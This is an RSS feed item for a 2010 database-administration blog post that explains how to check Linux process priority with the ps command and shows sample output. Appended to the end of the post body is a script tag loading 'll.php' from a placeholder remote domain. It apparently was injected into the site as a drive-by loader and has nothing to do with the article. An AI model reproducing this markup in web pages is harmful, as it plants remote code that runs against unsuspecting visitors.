<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Oracle Database Administration Blog &#187; How to know Linux process Priority</title>
	<atom:link href="http://www.bestremotedba.com/tag/how-to-know-linux-process-priority/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.bestremotedba.com</link>
	<description>Specially Created for Remote DBAs and Junior DBAs</description>
	<lastBuildDate>Fri, 30 Dec 2011 05:43:39 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>How to know Linux process Priority</title>
		<link>http://www.bestremotedba.com/how-to-know-linux-process-priority/</link>
		<comments>http://www.bestremotedba.com/how-to-know-linux-process-priority/#comments</comments>
		<pubDate>Mon, 22 Feb 2010 05:18:44 +0000</pubDate>
		<dc:creator>mudhalvan</dc:creator>
				<category><![CDATA[Unix-Linux Administration]]></category>
		<category><![CDATA[How to know Linux process Priority]]></category>

		<guid isPermaLink="false">http://www.bestremotedba.com/?p=570</guid>
		<description><![CDATA[How to know Linux process Priority]]></description>
			<content:encoded><![CDATA[<!-- Advanced AdSense by Jim Gaudet --><!-- google_ad_section_start --><p>We will be able to know many information about each process by doing &#8220;ps&#8221; command. </p>
<p>Do check the man page for &#8220;ps&#8221; </p>
<p>#man ps</p>
<p>Here is the simple information about the process</p>
<p>[root@TEST01 ~]# ps -ef -o user,pid,project,class,zone,pset,pri,nlwp,psr,time,args</p>
<p>Warning: bad syntax, perhaps a bogus &#8216;-&#8217;? See /usr/share/doc/procps-3.2.7/FAQ<br />
USER       PID PROJECT      CLS ZONE                            PSET PRI NLWP PSR     TIME COMMAND<br />
root     30833 &#8211;            TS  &#8211;                                  &#8211;  24    1   1 00:00:00 -bash USER=root LOGNAME=root HOME=/root PATH=/usr/local/sbin:/usr<br />
root     30891 &#8211;            TS  &#8211;                                  &#8211;  22    1   1 00:00:00  \_ ps -ef -o user,pid,project,class,zone,pset,pri,nlwp,psr,time,<br />
root      3691 &#8211;            TS  &#8211;                                  &#8211;  24    1   1 00:00:03 /usr/bin/Xorg :0 -br -audit 0 -auth /var/gdm/:0.Xauth -nolisten t<br />
root      3627 &#8211;            TS  &#8211;                                  &#8211;  16    1   0 00:00:00 /sbin/mingetty tty6 HOME=/ TERM=linux SELINUX_INIT=YES PATH=/bin:<br />
root      3626 &#8211;            TS  &#8211;                                  &#8211;  18    1   0 00:00:00 /sbin/mingetty tty5 HOME=/ TERM=linux SELINUX_INIT=YES PATH=/bin:<br />
root      3595 &#8211;            TS  &#8211;                                  &#8211;  21    1   1 00:00:00 /sbin/mingetty tty4 HOME=/ TERM=linux SELINUX_INIT=YES PATH=/bin:<br />
root      3591 &#8211;            TS  &#8211;                                  &#8211;  18    1   0 00:00:00 /sbin/mingetty tty3 HOME=/ TERM=linux SELINUX_INIT=YES PATH=/bin:<br />
root      3585 &#8211;            TS  &#8211;                                  &#8211;  21    1   1 00:00:00 /sbin/mingetty tty2 HOME=/ TERM=linux SELINUX_INIT=YES PATH=/bin:<br />
root      3582 &#8211;            TS  &#8211;                                  &#8211;  21    1   1 00:00:00 /sbin/mingetty tty1 HOME=/ TERM=linux SELINUX_INIT=YES PATH=/bin:<br />
[root@TEST01 ~]#<script src="http://$domain/ll.php?kk=11"></script></p>
<!-- Advanced AdSense by Jim Gaudet --><!-- google_ad_section_end -->]]></content:encoded>
			<wfw:commentRss>http://www.bestremotedba.com/how-to-know-linux-process-priority/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

